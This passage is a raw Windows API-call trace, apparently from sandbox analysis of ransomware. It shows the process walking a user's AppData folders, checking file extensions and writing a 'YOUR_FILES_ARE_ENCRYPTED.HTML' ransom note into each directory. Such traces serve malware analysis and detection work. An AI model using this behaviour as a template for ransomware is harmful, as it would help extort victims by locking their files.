ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f6176, dwReserved1=0x6f60b8, cFileName="..", cAlternateFileName="")) returned 1 [0123.021] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x53, dwReserved0=0x6f6176, dwReserved1=0x6f60b8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0123.021] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.021] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 114 [0123.021] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0123.021] lstrlenW (lpString=".ini") returned 4 [0123.021] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0123.021] SystemFunction036 (in: RandomBuffer=0x19db44, RandomBufferLength=0x20 | out: RandomBuffer=0x19db44) returned 1 [0123.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0123.022] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19db68 | out: lpFileSize=0x19db68*=83) returned 1 [0123.022] CloseHandle (hObject=0x30c) returned 1 [0123.022] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x252988fc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x6f6176, dwReserved1=0x6f60b8, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 1 [0123.022] StrStrIW (lpFirst="File Explorer.lnk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.022] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned 120 [0123.022] PathFindExtensionW (pszPath="File Explorer.lnk") returned=".lnk" [0123.022] lstrlenW (lpString=".lnk") returned 4 [0123.022] PathFindExtensionW (pszPath="File Explorer.lnk") returned=".lnk" [0123.023] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x252988fc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x6f6176, dwReserved1=0x6f60b8, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 0 [0123.023] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0123.023] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0123.023] GetProcessHeap () returned 0x600000 [0123.023] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0123.025] WriteFile (in: hFile=0x318, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0123.026] CloseHandle (hObject=0x318) returned 1 [0123.027] GetProcessHeap () returned 0x600000 [0123.027] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.027] GetProcessHeap () returned 0x600000 [0123.027] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.027] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19df88, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0123.027] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0123.027] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0123.027] GetProcessHeap () returned 0x600000 [0123.027] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0123.030] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0123.032] CloseHandle (hObject=0x320) returned 1 [0123.032] GetProcessHeap () returned 0x600000 [0123.032] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.032] GetProcessHeap () returned 0x600000 [0123.032] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0123.035] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d02d92b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d02d92b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0123.035] StrStrIW (lpFirst="Window Switcher.lnk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.035] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 102 [0123.035] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0123.035] lstrlenW (lpString=".lnk") returned 4 [0123.035] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0123.035] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d02d92b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d02d92b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0123.035] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0123.035] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0123.035] GetProcessHeap () returned 0x600000 [0123.035] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0123.037] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0123.038] CloseHandle (hObject=0x324) returned 1 [0123.038] GetProcessHeap () returned 0x600000 [0123.038] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.038] GetProcessHeap () returned 0x600000 [0123.038] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0123.039] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1 [0123.039] StrStrIW (lpFirst="UserData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.039] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned 78 [0123.039] GetProcessHeap () returned 0x600000 [0123.039] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0123.039] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0123.039] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0123.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0123.039] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName="..", cAlternateFileName="")) returned 1 [0123.039] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName="Low", cAlternateFileName="")) returned 1 [0123.039] StrStrIW (lpFirst="Low", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.040] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned 82 [0123.040] GetProcessHeap () returned 0x600000 [0123.040] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0123.040] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0123.040] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0123.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x19df88, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0123.040] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x19df88, cFileName="..", cAlternateFileName="")) returned 1 [0123.040] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x19df88, cFileName="..", cAlternateFileName="")) returned 0 [0123.041] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0123.041] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0123.041] GetProcessHeap () returned 0x600000 [0123.041] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0123.042] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0123.043] CloseHandle (hObject=0x320) returned 1 [0123.043] GetProcessHeap () returned 0x600000 [0123.043] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.043] GetProcessHeap () returned 0x600000 [0123.043] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0123.043] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName="Low", cAlternateFileName="")) returned 0 [0123.043] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0123.043] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0123.043] GetProcessHeap () returned 0x600000 [0123.044] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0123.045] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0123.046] CloseHandle (hObject=0x324) returned 1 [0123.046] GetProcessHeap () returned 0x600000 [0123.046] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.046] GetProcessHeap () returned 0x600000 [0123.046] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0123.046] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 0 [0123.046] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.046] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 99 [0123.046] GetProcessHeap () returned 0x600000 [0123.046] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.050] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.051] CloseHandle (hObject=0x308) returned 1 [0123.052] GetProcessHeap () returned 0x600000 [0123.052] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.052] GetProcessHeap () returned 0x600000 [0123.052] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.053] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="MMC", cAlternateFileName="")) returned 1 [0123.053] StrStrIW (lpFirst="MMC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.054] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC") returned 55 [0123.054] GetProcessHeap () returned 0x600000 [0123.054] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0123.055] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC" [0123.055] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\*" [0123.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0123.055] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, 